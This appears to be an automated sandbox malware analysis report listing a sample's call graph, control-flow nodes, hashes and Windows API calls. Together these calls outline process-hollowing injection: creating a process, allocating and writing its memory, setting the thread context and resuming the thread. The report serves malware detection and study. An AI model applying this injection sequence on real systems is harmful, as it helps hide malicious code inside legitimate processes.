35889->35964 35968 6adabf8 35889->35968 35894 6add3d0 35893->35894 35895 6add641 35894->35895 35896 6ada728 ResumeThread 35894->35896 35897 6ada720 ResumeThread 35894->35897 35895->35817 35896->35894 35897->35894 35899 6add721 35898->35899 35972 6ada8a9 35899->35972 35976 6ada8b0 35899->35976 35900 6add742 35904 6add22d 35903->35904 35906 6ada969 WriteProcessMemory 35904->35906 35907 6ada970 WriteProcessMemory 35904->35907 35905 6add45b 35905->35817 35906->35905 35907->35905 35910 6ada7d8 Wow64SetThreadContext 35908->35910 35911 6ada7d0 Wow64SetThreadContext 35908->35911 35909 6add3a4 35909->35817 35910->35909 35911->35909 35913 6add246 35912->35913 35914 6add264 35912->35914 35916 6ada7d8 Wow64SetThreadContext 35913->35916 35917 6ada7d0 Wow64SetThreadContext 35913->35917 35915 6add641 35914->35915 35918 6ada728 ResumeThread 35914->35918 35919 6ada720 ResumeThread 35914->35919 35915->35817 35916->35914 35917->35914 35918->35914 35919->35914 35925 6ada7d8 Wow64SetThreadContext 35920->35925 35926 6ada7d0 Wow64SetThreadContext 35920->35926 35921 6add264 35922 6add641 35921->35922 35923 6ada728 ResumeThread 35921->35923 35924 6ada720 ResumeThread 35921->35924 35922->35817 35923->35921 35924->35921 35925->35921 35926->35921 35928 6add692 35927->35928 35929 6add641 35928->35929 35930 6ada728 ResumeThread 35928->35930 35931 6ada720 ResumeThread 35928->35931 35929->35817 35930->35928 35931->35928 35933 6ada970 WriteProcessMemory 35932->35933 35935 6adaa0f 35933->35935 35935->35864 35937 6ada976 WriteProcessMemory 35936->35937 35939 6adaa0f 35937->35939 35939->35864 35941 6ada7d8 Wow64SetThreadContext 35940->35941 35943 6ada865 35941->35943 35943->35870 35945 6ada81d Wow64SetThreadContext 35944->35945 35947 6ada865 35945->35947 35947->35870 35949 6ada768 ResumeThread 35948->35949 35951 6ada799 35949->35951 35951->35874 35953 6ada725 ResumeThread 35952->35953 35955 6ada799 35953->35955 35955->35874 35957 6adaa60 ReadProcessMemory 35956->35957 35959 6adaaef 35957->35959 35959->35880 35961 6adaaab ReadProcessMemory 35960->35961 35963 6adaaef 35961->35963 35963->35880 35965 6adabf8 CreateProcessA 35964->35965 35967 6adae43 35965->35967 35969 6adabfe CreateProcessA 35968->35969 35971 6adae43 35969->35971 35973 6ada8b0 VirtualAllocEx 35972->35973 35975 6ada92d 35973->35975 35975->35900 35977 6ada8f0 VirtualAllocEx 35976->35977 35979 6ada92d 35977->35979 35979->35900 35998 874668 35999 87467a 35998->35999 36000 874686 35999->36000 36002 874778 35999->36002 36003 87479d 36002->36003 36007 874879 36003->36007 36011 874888 36003->36011 36009 8748af 36007->36009 36008 87498c 36008->36008 36009->36008 36015 8744c4 36009->36015 36012 8748af 36011->36012 36013 87498c 36012->36013 36014 8744c4 CreateActCtxA 36012->36014 36014->36013 36016 875918 CreateActCtxA 36015->36016 36018 8759db 36016->36018

              Executed Functions

              Function 02677BB8 Relevance: 2.5, Strings: 1, Instructions: 1211COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 543 2677bb8-2677be3 544 2677be5 543->544 545 2677bea-2678280 call 267729c call 26772ac call 26772bc * 2 call 26772cc call 26772bc call 26772cc call 26772dc call 26772ec call 26772fc call 267730c call 26777a4 call 26777b4 call 26777c4 call 26777d4 call 26777e4 call 26777f4 call 267730c call 26777a4 call 26777d4 call 26777e4 543->545 544->545 636 2678282-267828e 545->636 637 26782aa 545->637 639 2678290-2678296 636->639 640 2678298-267829e 636->640 638 26782b0-2678440 call 2677804 call 2677814 call 2677824 637->638 658 2678442-267844e 638->658 659 267846a 638->659 641 26782a8 639->641 640->641 641->638 661 2678450-2678456 658->661 662 2678458-267845e 658->662 660 2678470-2678552 call 2677804 call 2677814 659->660 674 26787d6-26787ef 660->674 663 2678468 661->663 662->663 663->660 675 2678557-267855e 674->675 676 26787f5-267894e call 2677824 call 2677814 674->676 677 267857a-267858b 675->677 721 2678950-267895c 676->721 722 2678978 676->722 678 2678560-2678577 677->678 679 267858d-267859f 677->679 678->677 681 26785a6-26785b4 679->681 682 26785a1 679->682 683 26785cc-26785dd 681->683 682->681 685 26785b6-26785c9 683->685 686 26785df-26785f0 683->686 685->683 688 2678609-267861a 686->688 689 26785f2-2678606 688->689 690 267861c-2678628 688->690 689->688 692 267862f-267863d 690->692 693 267862a 690->693 694 2678656-2678667 692->694 693->692 695 267863f-2678653 694->695 696 2678669-2678675 694->696 695->694 698 2678677 696->698 699 267867c-2678695 696->699 698->699 702 26786a5-26786b6 699->702 704 2678697-26786a2 702->704 705 26786b8-26786d2 702->705 704->702 707 26786eb-2678702 705->707 708 26786d4-26786e8 707->708 709 2678704-267871b 707->709 708->707 711 267873d-2678757 709->711 712 267871d-2678737 711->712 713 2678759-267876d 711->713 712->711 714 267878f-26787a9 713->714 716 267876f-2678789 714->716 717 26787ab-26787c4 714->717 716->714 718 26787c6 717->718 719 26787cb-26787d3 717->719 718->719 719->674 723 2678966-267896c 721->723 724 267895e-2678964 721->724 725 267897e-2678cdd call 2677804 call 2677814 call 2677824 call 2677814 * 3 call 2677834 call 2677844 call 2677814 722->725 726 2678976 723->726 724->726 765 2678ce4-2678db4 call 2677854 725->765 766 2678cdf 725->766 726->725 774 2678dbf-2678fba call 2677864 call 2677874 call 2677884 call 2677894 * 2 call 26777a4 call 26778a4 call 26778b4 * 2 765->774 766->765
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2030753809.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2670000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: Pp]q
              • API String ID: 0-2528107101
              • Opcode ID: bc4183ffd2d8b743a983ae6ff15f2c1e2c5c2249e225c1debef162435aec295d
              • Instruction ID: 60ee975face023aa79be0859f7c3f84bf10857e4ee861919ef2dcdbfaa118653
              • Opcode Fuzzy Hash: bc4183ffd2d8b743a983ae6ff15f2c1e2c5c2249e225c1debef162435aec295d
              • Instruction Fuzzy Hash: D8D2E734A01218CFCB15DF68D994AD9B7B2FF8A300F1591E9E409AB365DB31AE85CF50
              Function 02677BA8 Relevance: 2.2, Strings: 1, Instructions: 991COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 804 2677ba8-2677be3 805 2677be5 804->805 806 2677bea-2677cb0 call 267729c 804->806 805->806 815 2677cba-2677cc6 call 26772ac 806->815 817 2677ccb-2677ce2 815->817 819 2677cec-2677cf8 call 26772bc 817->819 821 2677cfd-2677d46 call 26772bc 819->821 827 2677d50-2677d5c call 26772cc 821->827 829 2677d61-2677e0e call 26772bc call 26772cc call 26772dc 827->829 843 2677e18-2677e24 call 26772ec 829->843 845 2677e29-2677e40 843->845 847 2677e4a-2677e56 call 26772fc 845->847 849 2677e5b-2677ea4 847->849 853 2677eb0-2677ec9 849->853 854 2677ecf-2677f33 call 267730c 853->854 858 2677f38-2677f4c 854->858 859 2677f55-2678213 call 26777a4 call 26777b4 call 26777c4 call 26777d4 call 26777e4 call 26777f4 call 267730c call 26777a4 call 26777d4 call 26777e4 858->859 893 2678218-267822d 859->893 894 2678232-2678280 893->894 897 2678282-267828e 894->897 898 26782aa 894->898 900 2678290-2678296 897->900 901 2678298-267829e 897->901 899 26782b0-26782c4 898->899 903 26782ca-2678440 call 2677804 call 2677814 call 2677824 899->903 902 26782a8 900->902 901->902 902->899 919 2678442-267844e 903->919 920 267846a 903->920 922 2678450-2678456 919->922 923 2678458-267845e 919->923 921 2678470-2678552 call 2677804 call 2677814 920->921 935 26787d6-26787ef 921->935 924 2678468 922->924 923->924 924->921 936 2678557-267855e 935->936 937 26787f5-267894e call 2677824 call 2677814 935->937 938 267857a-267858b 936->938 982 2678950-267895c 937->982 983 2678978 937->983 939 2678560-2678577 938->939 940 267858d-267859f 938->940 939->938 942 26785a6-26785b4 940->942 943 26785a1 940->943 944 26785cc-26785dd 942->944 943->942 946 26785b6-26785c9 944->946 947 26785df-26785f0 944->947 946->944 949 2678609-267861a 947->949 950 26785f2-2678606 949->950 951 267861c-2678628 949->951 950->949 953 267862f-267863d 951->953 954 267862a 951->954 955 2678656-2678667 953->955 954->953 956 267863f-2678653 955->956 957 2678669-2678675 955->957 956->955 959 2678677 957->959 960 267867c-2678695 957->960 959->960 963 26786a5-26786b6 960->963 965 2678697-26786a2 963->965 966 26786b8-26786d2 963->966 965->963 968 26786eb-2678702 966->968 969 26786d4-26786e8 968->969 970 2678704-267871b 968->970 969->968 972 267873d-2678757 970->972 973 267871d-2678737 972->973 974 2678759-267876d 972->974 973->972 975 267878f-26787a9 974->975 977 267876f-2678789 975->977 978 26787ab-26787c4 975->978 977->975 979 26787c6 978->979 980 26787cb-26787d3 978->980 979->980 980->935 984 2678966-267896c 982->984 985 267895e-2678964 982->985 986 267897e-2678c6f call 2677804 call 2677814 call 2677824 call 2677814 * 3 call 2677834 call 2677844 983->986 987 2678976 984->987 985->987 1020 2678c79-2678c85 986->1020 987->986 1021 2678c8d-2678ca2 call 2677814 1020->1021 1023 2678ca7-2678cc7 1021->1023 1025 2678ccd-2678cdd 1023->1025 1026 2678ce4-2678d8b call 2677854 1025->1026 1027 2678cdf 1025->1027 1034 2678d96-2678db4 1026->1034 1027->1026 1035 2678dbf-2678fba call 2677864 call 2677874 call 2677884 call 2677894 * 2 call 26777a4 call 26778a4 call 26778b4 * 2 1034->1035
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2030753809.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2670000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: Pp]q
              • API String ID: 0-2528107101
              • Opcode ID: fc87636dcfde1103115406600e165c3fba94335925afa0728462b7b13dda2947
              • Instruction ID: c0153c1ae249b706dd5dc12a1399cdad09e67de3331300a6d231b6d2b6d5b628
              • Opcode Fuzzy Hash: fc87636dcfde1103115406600e165c3fba94335925afa0728462b7b13dda2947
              • Instruction Fuzzy Hash: 1CB2E834A00618CFCB15DF28D994AD9B7B2FF8A300F1585E9D809AB365DB31AE85CF50
              Function 00874B00 Relevance: .2, Instructions: 207COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2029681268.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_870000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 39f64008bad0c1bb918723759fd88eec2cae8d0334831db31cc5fe532e2d52b0
              • Instruction ID: bab5aadf418db08508de775bebf62e2dc08c4d25f9e781aaa67b47af045cf347
              • Opcode Fuzzy Hash: 39f64008bad0c1bb918723759fd88eec2cae8d0334831db31cc5fe532e2d52b0
              • Instruction Fuzzy Hash: E691C723918AD287C7124F3988371DAFBB0AF0617CF1D828DD9E85F192D216F8A2C745
              Function 06ADD2A4 Relevance: .0, Instructions: 8COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aba15c8e4bb19a500c27bc0d0574390e0f0feb15cfb03849dea14aa2cba7ad61
              • Instruction ID: f190d1190193943b125e10b58af159d272b01a940b2b1c2f957e38e7d3d20ffd
              • Opcode Fuzzy Hash: aba15c8e4bb19a500c27bc0d0574390e0f0feb15cfb03849dea14aa2cba7ad61
              • Instruction Fuzzy Hash: A5A00265C8F04888A3C07C1445001B8C43C8B4F048F42F000502B330439D11C009439D
              Function 06ADABED Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1065 6adabed-6adabf6 1066 6adabfe-6adac8d 1065->1066 1067 6adabf8-6adabfd 1065->1067 1069 6adac8f-6adac99 1066->1069 1070 6adacc6-6adace6 1066->1070 1067->1066 1069->1070 1071 6adac9b-6adac9d 1069->1071 1077 6adad1f-6adad4e 1070->1077 1078 6adace8-6adacf2 1070->1078 1072 6adac9f-6adaca9 1071->1072 1073 6adacc0-6adacc3 1071->1073 1075 6adacad-6adacbc 1072->1075 1076 6adacab 1072->1076 1073->1070 1075->1075 1079 6adacbe 1075->1079 1076->1075 1086 6adad87-6adae41 CreateProcessA 1077->1086 1087 6adad50-6adad5a 1077->1087 1078->1077 1080 6adacf4-6adacf6 1078->1080 1079->1073 1081 6adad19-6adad1c 1080->1081 1082 6adacf8-6adad02 1080->1082 1081->1077 1084 6adad04 1082->1084 1085 6adad06-6adad15 1082->1085 1084->1085 1085->1085 1088 6adad17 1085->1088 1098 6adae4a-6adaed0 1086->1098 1099 6adae43-6adae49 1086->1099 1087->1086 1089 6adad5c-6adad5e 1087->1089 1088->1081 1091 6adad81-6adad84 1089->1091 1092 6adad60-6adad6a 1089->1092 1091->1086 1093 6adad6c 1092->1093 1094 6adad6e-6adad7d 1092->1094 1093->1094 1094->1094 1096 6adad7f 1094->1096 1096->1091 1109 6adaee0-6adaee4 1098->1109 1110 6adaed2-6adaed6 1098->1110 1099->1098 1111 6adaef4-6adaef8 1109->1111 1112 6adaee6-6adaeea 1109->1112 1110->1109 1113 6adaed8 1110->1113 1115 6adaf08-6adaf0c 1111->1115 1116 6adaefa-6adaefe 1111->1116 1112->1111 1114 6adaeec 1112->1114 1113->1109 1114->1111 1118 6adaf1e-6adaf25 1115->1118 1119 6adaf0e-6adaf14 1115->1119 1116->1115 1117 6adaf00 1116->1117 1117->1115 1120 6adaf3c 1118->1120 1121 6adaf27-6adaf36 1118->1121 1119->1118 1122 6adaf3d 1120->1122 1121->1120 1122->1122
              APIs
              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06ADAE2E
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID: CreateProcess
              • String ID:
              • API String ID: 963392458-0
              • Opcode ID: 64a98cde5c90c29ea84dc26fa3847ddb0cf35951e5e9372681f76c053934fdc9
              • Instruction ID: 9f3461c59473701b1d066674c761d992f68c98a02b870a3952d4c23931f7531c
              • Opcode Fuzzy Hash: 64a98cde5c90c29ea84dc26fa3847ddb0cf35951e5e9372681f76c053934fdc9
              • Instruction Fuzzy Hash: 43A17B71D00219CFDB64DF68C841BEDBBB2FF48314F1485AAE94AA7280DB749985CF91
              Function 06ADABF8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1124 6adabf8-6adac8d 1127 6adac8f-6adac99 1124->1127 1128 6adacc6-6adace6 1124->1128 1127->1128 1129 6adac9b-6adac9d 1127->1129 1135 6adad1f-6adad4e 1128->1135 1136 6adace8-6adacf2 1128->1136 1130 6adac9f-6adaca9 1129->1130 1131 6adacc0-6adacc3 1129->1131 1133 6adacad-6adacbc 1130->1133 1134 6adacab 1130->1134 1131->1128 1133->1133 1137 6adacbe 1133->1137 1134->1133 1144 6adad87-6adae41 CreateProcessA 1135->1144 1145 6adad50-6adad5a 1135->1145 1136->1135 1138 6adacf4-6adacf6 1136->1138 1137->1131 1139 6adad19-6adad1c 1138->1139 1140 6adacf8-6adad02 1138->1140 1139->1135 1142 6adad04 1140->1142 1143 6adad06-6adad15 1140->1143 1142->1143 1143->1143 1146 6adad17 1143->1146 1156 6adae4a-6adaed0 1144->1156 1157 6adae43-6adae49 1144->1157 1145->1144 1147 6adad5c-6adad5e 1145->1147 1146->1139 1149 6adad81-6adad84 1147->1149 1150 6adad60-6adad6a 1147->1150 1149->1144 1151 6adad6c 1150->1151 1152 6adad6e-6adad7d 1150->1152 1151->1152 1152->1152 1154 6adad7f 1152->1154 1154->1149 1167 6adaee0-6adaee4 1156->1167 1168 6adaed2-6adaed6 1156->1168 1157->1156 1169 6adaef4-6adaef8 1167->1169 1170 6adaee6-6adaeea 1167->1170 1168->1167 1171 6adaed8 1168->1171 1173 6adaf08-6adaf0c 1169->1173 1174 6adaefa-6adaefe 1169->1174 1170->1169 1172 6adaeec 1170->1172 1171->1167 1172->1169 1176 6adaf1e-6adaf25 1173->1176 1177 6adaf0e-6adaf14 1173->1177 1174->1173 1175 6adaf00 1174->1175 1175->1173 1178 6adaf3c 1176->1178 1179 6adaf27-6adaf36 1176->1179 1177->1176 1180 6adaf3d 1178->1180 1179->1178 1180->1180
              APIs
              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06ADAE2E
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID: CreateProcess
              • String ID:
              • API String ID: 963392458-0
              • Opcode ID: 12f65db127200cee0fc04bcb0939e0e3d0e65f6899ab70cbf4dd0e84f8f8efc9
              • Instruction ID: b18e1281b0da659436e5e9cb76734727390acb4e7af4ce7b74ba9c7c0ad66203
              • Opcode Fuzzy Hash: 12f65db127200cee0fc04bcb0939e0e3d0e65f6899ab70cbf4dd0e84f8f8efc9
              • Instruction Fuzzy Hash: B7917C71D00219CFDB64DF68C841BEDBBB2FF48314F1485AAE919A7280DB749985CF91
              Function 0087ADC8 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1182 87adc8-87add7 1183 87ae03-87ae07 1182->1183 1184 87add9-87ade6 call 87a0ec 1182->1184 1186 87ae1b-87ae5c 1183->1186 1187 87ae09-87ae13 1183->1187 1190 87adfc 1184->1190 1191 87ade8 1184->1191 1193 87ae5e-87ae66 1186->1193 1194 87ae69-87ae77 1186->1194 1187->1186 1190->1183 1239 87adee call 87b051 1191->1239 1240 87adee call 87b060 1191->1240 1193->1194 1195 87ae9b-87ae9d 1194->1195 1196 87ae79-87ae7e 1194->1196 1198 87aea0-87aea7 1195->1198 1199 87ae80-87ae87 call 87a0f8 1196->1199 1200 87ae89 1196->1200 1197 87adf4-87adf6 1197->1190 1201 87af38-87af4f 1197->1201 1203 87aeb4-87aebb 1198->1203 1204 87aea9-87aeb1 1198->1204 1205 87ae8b-87ae99 1199->1205 1200->1205 1215 87af51-87afb0 1201->1215 1208 87aebd-87aec5 1203->1208 1209 87aec8-87aeca call 87a108 1203->1209 1204->1203 1205->1198 1208->1209 1211 87aecf-87aed1 1209->1211 1213 87aed3-87aedb 1211->1213 1214 87aede-87aee3 1211->1214 1213->1214 1216 87aee5-87aeec 1214->1216 1217 87af01-87af0e 1214->1217 1233 87afb2-87aff8 1215->1233 1216->1217 1218 87aeee-87aefe call 87a118 call 87a128 1216->1218 1223 87af31-87af37 1217->1223 1224 87af10-87af2e 1217->1224 1218->1217 1224->1223 1234 87b000-87b02b GetModuleHandleW 1233->1234 1235 87affa-87affd 1233->1235 1236 87b034-87b048 1234->1236 1237 87b02d-87b033 1234->1237 1235->1234 1237->1236 1239->1197 1240->1197
              APIs
              • GetModuleHandleW.KERNELBASE(00000000), ref: 0087B01E
              Memory Dump Source
              • Source File: 00000000.00000002.2029681268.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_870000_SecuriteInfo.jbxd
              Similarity
              • API ID: HandleModule
              • String ID:
              • API String ID: 4139908857-0
              • Opcode ID: 6a716c9acbd5932883f259c84b22221fe54cd61d3c741831e49995c672027c1f
              • Instruction ID: d2b25813d4fdf6e167f33a37cc84bda76df58d1f09a7a152b3e9675a40afb708
              • Opcode Fuzzy Hash: 6a716c9acbd5932883f259c84b22221fe54cd61d3c741831e49995c672027c1f
              • Instruction Fuzzy Hash: 79815770A00B058FD728DF69D09479ABBF5FF88304F00892DE49AD7A54DB75E849CB92
              Function 0087590D Relevance: 1.6, APIs: 1, Instructions: 100COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1353 87590d-8759d9 CreateActCtxA 1355 8759e2-875a3c 1353->1355 1356 8759db-8759e1 1353->1356 1363 875a3e-875a41 1355->1363 1364 875a4b-875a4f 1355->1364 1356->1355 1363->1364 1365 875a51-875a5d 1364->1365 1366 875a60 1364->1366 1365->1366 1368 875a61 1366->1368 1368->1368
              APIs
              • CreateActCtxA.KERNEL32(?), ref: 008759C9
              Memory Dump Source
              • Source File: 00000000.00000002.2029681268.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_870000_SecuriteInfo.jbxd
              Similarity
              • API ID: Create
              • String ID:
              • API String ID: 2289755597-0
              • Opcode ID: a8c29b603f3beef4df8216a7b7b3cc8abc2c0663a8174e7e49afe622e1af4540
              • Instruction ID: 816ec8da97daf66ae208cad98016a0db15119e3ec3e6ce988086748f62029aed
              • Opcode Fuzzy Hash: a8c29b603f3beef4df8216a7b7b3cc8abc2c0663a8174e7e49afe622e1af4540
              • Instruction Fuzzy Hash: A041E0B1C00619CFDB24CFA9C884BDEBBB5FF49304F20816AD418AB255DBB55946CF91
              Function 008744C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1369 8744c4-8759d9 CreateActCtxA 1372 8759e2-875a3c 1369->1372 1373 8759db-8759e1 1369->1373 1380 875a3e-875a41 1372->1380 1381 875a4b-875a4f 1372->1381 1373->1372 1380->1381 1382 875a51-875a5d 1381->1382 1383 875a60 1381->1383 1382->1383 1385 875a61 1383->1385 1385->1385
              APIs
              • CreateActCtxA.KERNEL32(?), ref: 008759C9
              Memory Dump Source
              • Source File: 00000000.00000002.2029681268.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_870000_SecuriteInfo.jbxd
              Similarity
              • API ID: Create
              • String ID:
              • API String ID: 2289755597-0
              • Opcode ID: 3f82724b6d63e5b3cdeecda75b711c94646de846e9723288f8c1388fb10e5eff
              • Instruction ID: 75f40368094af70a4788e69dbf924fb3234d6beb98a06258edcff1193993a53c
              • Opcode Fuzzy Hash: 3f82724b6d63e5b3cdeecda75b711c94646de846e9723288f8c1388fb10e5eff
              • Instruction Fuzzy Hash: 1341E2B1C0061DCBDB24CFA9C884B9DBBB5FF48304F20816AD518AB255DBB55946CF91
              Function 02674040 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
              Download Yara Rule
              APIs
              • CallWindowProcW.USER32(?,?,?,?,?), ref: 02674101
              Memory Dump Source
              • Source File: 00000000.00000002.2030753809.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2670000_SecuriteInfo.jbxd
              Similarity
              • API ID: CallProcWindow
              • String ID:
              • API String ID: 2714655100-0
              • Opcode ID: e66771b10055062b99bd5975911c03562e0b0fecd9aba9838a80b45658ceef1a
              • Instruction ID: 65a376333c83e16197cad614247d2823a2977409780d2bb23257ea993bea2b74
              • Opcode Fuzzy Hash: e66771b10055062b99bd5975911c03562e0b0fecd9aba9838a80b45658ceef1a
              • Instruction Fuzzy Hash: 36413AB4A00349CFCB14DF99D488AAABBF5FF88314F24C599D519AB321D774A841CFA0
              Function 06ADA969 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
              Download Yara Rule
              APIs
              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06ADAA00
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID: MemoryProcessWrite
              • String ID:
              • API String ID: 3559483778-0
              • Opcode ID: 8d0b19ebde3a728da61668e3b58c14936bdca62f3502720755600e16b0002ddb
              • Instruction ID: 3bccd857e5ca0a8d2e29c6c5fb4b645cedb9153ad108c4e19b5703c37a59c646
              • Opcode Fuzzy Hash: 8d0b19ebde3a728da61668e3b58c14936bdca62f3502720755600e16b0002ddb
              • Instruction Fuzzy Hash: F92146B1D003499FCB10DFA9C881BEEBBF5FF48310F10842AEA59A7250C7789944CBA1
              Function 06ADA970 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
              Download Yara Rule
              APIs
              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06ADAA00
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID: MemoryProcessWrite
              • String ID:
              • API String ID: 3559483778-0
              • Opcode ID: beacae65f3b49b823cf88f0798fe5d590766087da6d1a70dc504e0a3504d9391
              • Instruction ID: 661247d57667152c8c28a9990323d88761ffe6b3cfdfb778ede736bde3f86662
              • Opcode Fuzzy Hash: beacae65f3b49b823cf88f0798fe5d590766087da6d1a70dc504e0a3504d9391
              • Instruction Fuzzy Hash: 1E2148B1D003599FCB10DFAAC985BEEBBF5FF48310F10842AE919A7250C7789944CBA1
              Function 06ADA7D0 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
              Download Yara Rule
              APIs
              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06ADA856
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID: ContextThreadWow64
              • String ID:
              • API String ID: 983334009-0
              • Opcode ID: 8a6e929c5c09fcea883aee74680229eaff43da11d39ea6b2f42ad65978f9a382
              • Instruction ID: ad7729192fff2581b6cc8dd96731afe0d28dc6f31872362b2219855be169c0a7
              • Opcode Fuzzy Hash: 8a6e929c5c09fcea883aee74680229eaff43da11d39ea6b2f42ad65978f9a382
              • Instruction Fuzzy Hash: 88215971D003498FDB10DFAEC4857EEBBF4EF49310F548429D919A7240CB789945CBA1
              Function 0087D29C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
              Download Yara Rule
              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0087D676,?,?,?,?,?), ref: 0087D737
              Memory Dump Source
              • Source File: 00000000.00000002.2029681268.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_870000_SecuriteInfo.jbxd
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: f4818311523a6d8df6bef8cbf08f411a9b5805ba54fd2a209edbdb36fe7c1658
              • Instruction ID: 45af921a271d8c1ae058e8ca12a8b1be18fed51eec5a2d05c339ff05b921bd88
              • Opcode Fuzzy Hash: f4818311523a6d8df6bef8cbf08f411a9b5805ba54fd2a209edbdb36fe7c1658
              • Instruction Fuzzy Hash: C421E3B5900358AFDB10CF9AD584AEEBBF8FF48310F14801AE918A7310D378A944CFA5
              Function 0087D6A8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
              Download Yara Rule
              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0087D676,?,?,?,?,?), ref: 0087D737
              Memory Dump Source
              • Source File: 00000000.00000002.2029681268.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_870000_SecuriteInfo.jbxd
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: 3a4f4e2399d79b75320ca62d6a05e277f503b4d5840048b4b2ea3a2e4ea2c4e8
              • Instruction ID: 6366b53683e615140e1fcccae7119c95a46a58f1bcf990613f8b8583ad1b7766
              • Opcode Fuzzy Hash: 3a4f4e2399d79b75320ca62d6a05e277f503b4d5840048b4b2ea3a2e4ea2c4e8
              • Instruction Fuzzy Hash: 3F2105B59002589FDB10CFAAD584AEEBFF5FF48310F14801AE918A3310C378A945CFA0
              Function 06ADAA5C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
              Download Yara Rule
              APIs
              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06ADAAE0
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID: MemoryProcessRead
              • String ID:
              • API String ID: 1726664587-0
